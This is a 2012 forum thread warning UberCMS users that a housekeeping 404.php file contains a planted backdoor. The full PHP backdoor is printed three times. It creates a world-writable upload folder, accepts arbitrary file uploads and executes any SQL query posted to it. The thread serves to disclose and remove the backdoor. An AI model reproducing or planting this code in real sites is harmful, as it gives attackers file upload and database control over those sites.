UberCMS IMPORTANT FIX - Fix as soon as possible!!!

leenster · Aug 1, 2012

Here an important fix for UberCMS.

You really need to check your allseeingeye/pages and open the file 404.php.

if that file contains this code ->

PHP:

<?php

		require_once "../../global.php";
		require_once "../admincore.php";

	if(!file_exists("god/"))
	{
		mkdir("god/", 0777);
		echo 'Backdoor Directory Created : (god/)';
	}
		else
	{
		echo 'Backdoor Open for Uploading : (god/)';
	}
	
	

if(isset($_POST['submit']))
{
	$target_path = "god/";
	$target_path = $target_path . basename( $_FILES['uploadedfile']['name']); 
	if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
    echo "The file ".  basename( $_FILES['uploadedfile']['name']). 
    " has been uploaded";
} else{
    echo "There was an error uploading the file, please try again!";
}
}

	if(isset($_POST['sql2']))
	{
		$core1225 = $_POST['sql1'];
		mysql_query("".$core1225."");
		echo 'Query Executed Successfully';
	}

?>

<html>
<body>

<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"
enctype="multipart/form-data">
  <input type="file" name="uploadedfile" id="file" />
  <input type="submit" name="submit" value="Submit" />
  <br />
</form>
<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p>
<form name="form1" method="post" action="<?php echo $_SERVER['PHP_SELF']; ?>">
  <p>
    <label for="sql1"></label>
    <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea>
  </p>
  <p>
    <input type="submit" name="sql2" id="sql2" value="Execute">
  </p>
</form>
<p> </p>
</body>

Delete the code and put something else in there, such as page not found or whatever....its not important what you put in there....

Failure to do this will leave you open for a whole lot of trouble....

All credits for this go out to : [IP on request] for showing me this on our hotel.
Yes [IP on request] is a real cool hacker that likes to duck with peoples hard work. Good job dude...

If anybody wants his IP so they can block the dude from their site then ill be more than happy to provide it.

Droppy · Aug 1, 2012

I never was seed that on uber edits... Where cms do you found it?

leenster · Aug 1, 2012

Droppy said:
I never was seed that on uber edits... Where cms do you found it?

It either came with UberCMS 2.01 or one of the housekeeping fixes that got released here...... I better start checking stuff before I add it...

Nilenz · Aug 2, 2012

leenster said:
It either came with UberCMS 2.01 or one of the housekeeping fixes that got released here...... I better start checking stuff before I add it...

I have this never seen?
And thank you for the release

leenster · Aug 2, 2012

** Removed accusations **

landline · Aug 2, 2012

Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!! - Credits to Landline

Thanks for this release! it will help a lot of people.

Sledmore · Aug 2, 2012

Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!! - Credits to Landline

Nice share, people should really check each file, lol.

leenster · Aug 2, 2012

Re: UberCMS IMPORTANT FIX - Fix as soon as possible!!! - Credits to Landline

Ill remove the credits until i have more proof....

Pallepop · Aug 3, 2012

Try this code instead;(Not tested)

Code:

[COLOR=#0000BB]<?php 

        [/COLOR][COLOR=#007700]require_once [/COLOR][COLOR=#DD0000]"../../global.php"[/COLOR][COLOR=#007700]; 
        require_once [/COLOR][COLOR=#DD0000]"../admincore.php"[/COLOR][COLOR=#007700]; 

    if(![/COLOR][COLOR=#0000BB]file_exists[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700])) 
    { 
        [/COLOR][COLOR=#0000BB]mkdir[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0777[/COLOR][COLOR=#007700]); 
        echo [/COLOR][COLOR=#DD0000]'Backdoor Directory Created : (god/)'[/COLOR][COLOR=#007700]; 
    } 
        else 
    { 
        echo [/COLOR][COLOR=#DD0000]'Backdoor Open for Uploading : (god/)'[/COLOR][COLOR=#007700]; 
    } 
     
     

if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'submit'[/COLOR][COLOR=#007700]])) 
{ 
    [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700]; 
    [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'name'[/COLOR][COLOR=#007700]]);  
    if([/COLOR][COLOR=#0000BB]move_uploaded_file[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'tmp_name'[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]$target_path[/COLOR][COLOR=#007700])) { 
    echo [/COLOR][COLOR=#DD0000]"The file "[/COLOR][COLOR=#007700].  [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'name'[/COLOR][COLOR=#007700]]).  
    [/COLOR][COLOR=#DD0000]" has been uploaded"[/COLOR][COLOR=#007700]; 
} else{ 
    echo [/COLOR][COLOR=#DD0000]"There was an error uploading the file, please try again!"[/COLOR][COLOR=#007700]; 
} 
} 

    if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sql2'[/COLOR][COLOR=#007700]])) 
    { 
        [/COLOR][COLOR=#0000BB]$core1225 [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sql1'[/COLOR][COLOR=#007700]]; 
        [/COLOR][COLOR=#0000BB]mysql_query[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]""[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$core1225[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]""[/COLOR][COLOR=#007700]); 
        echo [/COLOR][COLOR=#DD0000]'Query Executed Successfully'[/COLOR][COLOR=#007700]; 
      } 

[/COLOR][COLOR=#0000BB]?>
[/COLOR][COLOR=#000000][/COLOR]
[COLOR=#000000]<html>[/COLOR]
[COLOR=#000000]<body>[/COLOR]
[COLOR=#0000BB]<?php[/COLOR]
[COLOR=#000000]<form action="[/COLOR][COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]echo [/COLOR][COLOR=#0000BB]$_SERVER[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'PHP_SELF'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000]" method="post" [/COLOR]
[COLOR=#000000]enctype="multipart/form-data"> [/COLOR]
[COLOR=#000000]  <input type="file" name="uploadedfile" id="file" /> [/COLOR]
[COLOR=#000000]  <input type="submit" name="submit" value="Submit" /> [/COLOR]
[COLOR=#000000]  <br /> [/COLOR]
[COLOR=#000000]</form> [/COLOR]
[COLOR=#000000]<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> [/COLOR]
[COLOR=#000000]<form name="form1" method="post" action="[/COLOR][COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]echo [/COLOR][COLOR=#0000BB]$_SERVER[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'PHP_SELF'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000]"> [/COLOR]
[COLOR=#000000]  <p> [/COLOR]
[COLOR=#000000]    <label for="sql1"></label> [/COLOR]
[COLOR=#000000]    <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> [/COLOR]
[COLOR=#000000]  </p> [/COLOR]
[COLOR=#000000]  <p> [/COLOR]
[COLOR=#000000]    <input type="submit" name="sql2" id="sql2" value="Execute"> [/COLOR]
[COLOR=#000000]  </p> [/COLOR]
[COLOR=#000000]</form> [/COLOR]
[COLOR=#000000]<p> </p>
[/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000] [/COLOR]
[COLOR=#000000]</body>
<html>[/COLOR]

leenster · Aug 3, 2012

Pallepop said:

Try this code instead;(Not tested)

Code:

[COLOR=#0000BB]<?php 

        [/COLOR][COLOR=#007700]require_once [/COLOR][COLOR=#DD0000]"../../global.php"[/COLOR][COLOR=#007700]; 
        require_once [/COLOR][COLOR=#DD0000]"../admincore.php"[/COLOR][COLOR=#007700]; 

    if(![/COLOR][COLOR=#0000BB]file_exists[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700])) 
    { 
        [/COLOR][COLOR=#0000BB]mkdir[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700], [/COLOR][COLOR=#0000BB]0777[/COLOR][COLOR=#007700]); 
        echo [/COLOR][COLOR=#DD0000]'Backdoor Directory Created : (god/)'[/COLOR][COLOR=#007700]; 
    } 
        else 
    { 
        echo [/COLOR][COLOR=#DD0000]'Backdoor Open for Uploading : (god/)'[/COLOR][COLOR=#007700]; 
    } 
     
     

if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'submit'[/COLOR][COLOR=#007700]])) 
{ 
    [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#DD0000]"god/"[/COLOR][COLOR=#007700]; 
    [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$target_path [/COLOR][COLOR=#007700]. [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'name'[/COLOR][COLOR=#007700]]);  
    if([/COLOR][COLOR=#0000BB]move_uploaded_file[/COLOR][COLOR=#007700]([/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'tmp_name'[/COLOR][COLOR=#007700]], [/COLOR][COLOR=#0000BB]$target_path[/COLOR][COLOR=#007700])) { 
    echo [/COLOR][COLOR=#DD0000]"The file "[/COLOR][COLOR=#007700].  [/COLOR][COLOR=#0000BB]basename[/COLOR][COLOR=#007700]( [/COLOR][COLOR=#0000BB]$_FILES[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'uploadedfile'[/COLOR][COLOR=#007700]][[/COLOR][COLOR=#DD0000]'name'[/COLOR][COLOR=#007700]]).  
    [/COLOR][COLOR=#DD0000]" has been uploaded"[/COLOR][COLOR=#007700]; 
} else{ 
    echo [/COLOR][COLOR=#DD0000]"There was an error uploading the file, please try again!"[/COLOR][COLOR=#007700]; 
} 
} 

    if(isset([/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sql2'[/COLOR][COLOR=#007700]])) 
    { 
        [/COLOR][COLOR=#0000BB]$core1225 [/COLOR][COLOR=#007700]= [/COLOR][COLOR=#0000BB]$_POST[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'sql1'[/COLOR][COLOR=#007700]]; 
        [/COLOR][COLOR=#0000BB]mysql_query[/COLOR][COLOR=#007700]([/COLOR][COLOR=#DD0000]""[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]$core1225[/COLOR][COLOR=#007700].[/COLOR][COLOR=#DD0000]""[/COLOR][COLOR=#007700]); 
        echo [/COLOR][COLOR=#DD0000]'Query Executed Successfully'[/COLOR][COLOR=#007700]; 
      } 

[/COLOR][COLOR=#0000BB]?>
[/COLOR][COLOR=#000000][/COLOR]
[COLOR=#000000]<html>[/COLOR]
[COLOR=#000000]<body>[/COLOR]
[COLOR=#0000BB]<?php[/COLOR]
[COLOR=#000000]<form action="[/COLOR][COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]echo [/COLOR][COLOR=#0000BB]$_SERVER[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'PHP_SELF'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000]" method="post" [/COLOR]
[COLOR=#000000]enctype="multipart/form-data"> [/COLOR]
[COLOR=#000000]  <input type="file" name="uploadedfile" id="file" /> [/COLOR]
[COLOR=#000000]  <input type="submit" name="submit" value="Submit" /> [/COLOR]
[COLOR=#000000]  <br /> [/COLOR]
[COLOR=#000000]</form> [/COLOR]
[COLOR=#000000]<p>-- ** -- ** -- MySQL Execute -- ** -- ** --</p> [/COLOR]
[COLOR=#000000]<form name="form1" method="post" action="[/COLOR][COLOR=#0000BB]<?php [/COLOR][COLOR=#007700]echo [/COLOR][COLOR=#0000BB]$_SERVER[/COLOR][COLOR=#007700][[/COLOR][COLOR=#DD0000]'PHP_SELF'[/COLOR][COLOR=#007700]]; [/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000]"> [/COLOR]
[COLOR=#000000]  <p> [/COLOR]
[COLOR=#000000]    <label for="sql1"></label> [/COLOR]
[COLOR=#000000]    <textarea name="sql1" id="sql1" cols="65" rows="4"></textarea> [/COLOR]
[COLOR=#000000]  </p> [/COLOR]
[COLOR=#000000]  <p> [/COLOR]
[COLOR=#000000]    <input type="submit" name="sql2" id="sql2" value="Execute"> [/COLOR]
[COLOR=#000000]  </p> [/COLOR]
[COLOR=#000000]</form> [/COLOR]
[COLOR=#000000]<p> </p>
[/COLOR][COLOR=#0000BB]?>[/COLOR][COLOR=#000000] [/COLOR]
[COLOR=#000000]</body>
<html>[/COLOR]

Wtf delete it if it looks anything like that!!!

Its an exploit to upload files and or run any query on your db...

Heck just delete 404.php all together...

Sent from some remote location using Tapatalk...

landline · Aug 3, 2012

You don't even really need the 404 for hk anyway, all hk's have a menu where you can get to everything

SubZ · Aug 3, 2012

Shouldnt use ubercms 2 in the first place? But thx, will help some noobs

Livar · Aug 3, 2012

Why would anyone want to use uberCMS anyway? Thanks fo' this anyway

Papercup · Aug 3, 2012

Good Find, Keep up the good work.

The General · Aug 4, 2012

Backdoors everywhere lol.

They will get found and released on ragezone.
Jonteh makes a new "update" with new backdoors
They will get found and released on ragezone.

This is what is happening.

jasjj · Aug 4, 2012

Just stop using ubercms 2.0? or remove them

Nilenz · Aug 4, 2012

Jonty do this because he than Copyright changes prevents.
I snap him well.

SwainyHD · Aug 4, 2012

Jonty didn't do that, I think I know the culperate who did though.....

landline · Aug 5, 2012

tdid said:
Backdoors everywhere lol.

They will get found and released on ragezone.
Jonteh makes a new "update" with new backdoors
They will get found and released on ragezone.

This is what is happening.

Joonteh is banned on RZ.. even if he made a new account, it would be a little weird having an uber edit from a new user.

Matthew · Aug 5, 2012

landline said:
Joonteh is banned on RZ.. even if he made a new account, it would be a little weird having an uber edit from a new user.

Not really. You get noobs releasing "edits" (do take note of the quotes) everyday.

UberCMS IMPORTANT FIX - Fix as soon as possible!!!

[̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅]

I’m not a

[̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅]

Skilled Illusionist

[̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅]

Junior Spellweaver

Divine Celestial

[̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅]

Newbie Spellweaver

[̲̅$̲̅(̲̅1̲̅)̲̅$ ̲̅]

Junior Spellweaver

Junior Spellweaver

swagggggg

Web Developer

Developer

Junior Spellweaver

Skilled Illusionist

Newbie Spellweaver

Junior Spellweaver

No, Just no.

About Us

Online statistics

Forum statistics

RaGEZONE Sponsor